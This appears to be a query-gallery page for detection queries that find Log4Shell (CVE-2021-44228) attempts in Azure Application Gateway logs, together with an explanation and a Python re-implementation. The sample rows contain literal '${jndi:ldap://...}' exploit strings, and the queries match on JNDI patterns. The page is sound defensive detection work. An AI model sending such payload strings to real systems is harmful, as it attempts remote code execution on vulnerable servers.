Query Details

CVE-2021-44228

Query

//Detection rule for App Gateway rule hits for log4j vulnerability. Retrieve attacked host, malicious IP and malicious User Agent

//Data connector required for this query - Azure Diagnostics (Application Gateways)

AzureDiagnostics
| where details_data_s contains "jndi"
| parse-where details_data_s with * 'User-Agent:' MaliciousHost
| project TimeGenerated, Target=hostname_s, Actor=clientIp_s, MaliciousHost

//Detect the request URI directly where it starts with /$ or contains jndi
AzureDiagnostics
| where TimeGenerated > ago(1d)
| where ResourceType == "APPLICATIONGATEWAYS"
| project TimeGenerated, host_s, originalRequestUriWithArgs_s, clientIP_s
| where originalRequestUriWithArgs_s startswith "/$" or originalRequestUriWithArgs_s contains "jndi"
| parse-where originalRequestUriWithArgs_s with * '://' MaliciousHost

Explanation

This query looks for Application Gateway rule hits related to the log4j vulnerability (CVE-2021-44228). It retrieves the attacked host, the malicious client IP, and the malicious User-Agent. It relies on the Azure Diagnostics data connector for Application Gateways.

The first part of the query filters AzureDiagnostics rows on the presence of "jndi" in the details_data_s field. It then takes the text following "User-Agent:" as MaliciousHost (parse-where drops any row in which that marker is absent) and projects TimeGenerated, Target (hostname_s), Actor (clientIp_s), and MaliciousHost.

The second part filters AzureDiagnostics rows to those with ResourceType "APPLICATIONGATEWAYS" and a TimeGenerated within the last day. It projects TimeGenerated, host_s, originalRequestUriWithArgs_s, and clientIP_s, then keeps only rows whose originalRequestUriWithArgs_s starts with "/$" or contains "jndi". Finally it takes the text following "://" in originalRequestUriWithArgs_s as MaliciousHost, again dropping rows where no "://" is present.
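The same two detections re-implemented over constructed AzureDiagnostics-shaped rows, as an added example that is not the query author's code; it shows the parse-where drop behaviour and the ago(1d) window on concrete rows. The hostnames, IPs and log strings are made up, and the `row` helper is a hypothetical convenience for building sample rows.

```python
"""Re-implementation of the two CVE-2021-44228 App Gateway detections over constructed rows (added example)."""
from datetime import datetime, timedelta, timezone

NOW = datetime(2022, 6, 17, tzinfo=timezone.utc)  # constructed reference time for the ago(1d) window

def row(age, host, ip, uri, details=""):
    """Build one constructed AzureDiagnostics-shaped row dated `age` before NOW (hypothetical helper)."""
    return {"TimeGenerated": NOW - age, "ResourceType": "APPLICATIONGATEWAYS",
            "hostname_s": host, "clientIp_s": ip, "host_s": host, "clientIP_s": ip,
            "originalRequestUriWithArgs_s": uri, "details_data_s": details}

SAMPLE_ROWS = [  # constructed log rows, not real traffic
    # WAF rule hit: the lookup string arrived in the User-Agent header
    row(timedelta(hours=2), "shop.example.test", "198.51.100.7", "/",
        "Matched Data: jndi found within User-Agent: ${jndi:ldap://203.0.113.9:1389/a}"),
    # access log: lookup string carried in the query string
    row(timedelta(hours=5), "api.example.test", "203.0.113.44", "/login?u=${jndi:ldap://203.0.113.9:1389/x}"),
    # "/$" prefix but three days old: outside the second query's 1-day window
    row(timedelta(days=3), "api.example.test", "203.0.113.45", "/${jndi:rmi://203.0.113.9/y}"),
    # benign request
    row(timedelta(hours=1), "api.example.test", "192.0.2.10", "/products?id=42"),
]

def detect_waf_hits(rows):
    """First query: WAF details mentioning jndi; like parse-where, rows without 'User-Agent:' are dropped."""
    hits = []
    for r in rows:
        data = r["details_data_s"]
        _, marker, rest = data.partition("User-Agent:")
        if "jndi" in data.lower() and marker:  # KQL contains is case-insensitive
            hits.append({"TimeGenerated": r["TimeGenerated"], "Target": r["hostname_s"],
                         "Actor": r["clientIp_s"], "MaliciousHost": rest.strip()})  # KQL keeps the leading space
    return hits

def detect_uri_hits(rows, now=NOW):
    """Second query: last-day App Gateway rows whose URI starts with '/$' or contains jndi; text after '://'."""
    hits = []
    for r in rows:
        uri = r["originalRequestUriWithArgs_s"]
        in_window = r["TimeGenerated"] > now - timedelta(days=1) and r["ResourceType"] == "APPLICATIONGATEWAYS"
        _, marker, rest = uri.partition("://")
        if in_window and (uri.startswith("/$") or "jndi" in uri.lower()) and marker:
            hits.append({"TimeGenerated": r["TimeGenerated"], "host_s": r["host_s"],
                         "clientIP_s": r["clientIP_s"], "MaliciousHost": rest})
    return hits
```

Widening the window (passing an earlier `now`) brings the three-day-old "/$" row into the second detection, which is the knob to turn when hunting back past the default day.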

Details

Matt Zorich

Released: June 17, 2022

Tables

AzureDiagnostics

Keywords

Devices, Intune, User, AzureDiagnostics, Target, Actor, MaliciousHost, TimeGenerated, ResourceType, host_s, originalRequestUriWithArgs_s, clientIP_s

Operators

contains, parse-where, project, where, startswith, or, contains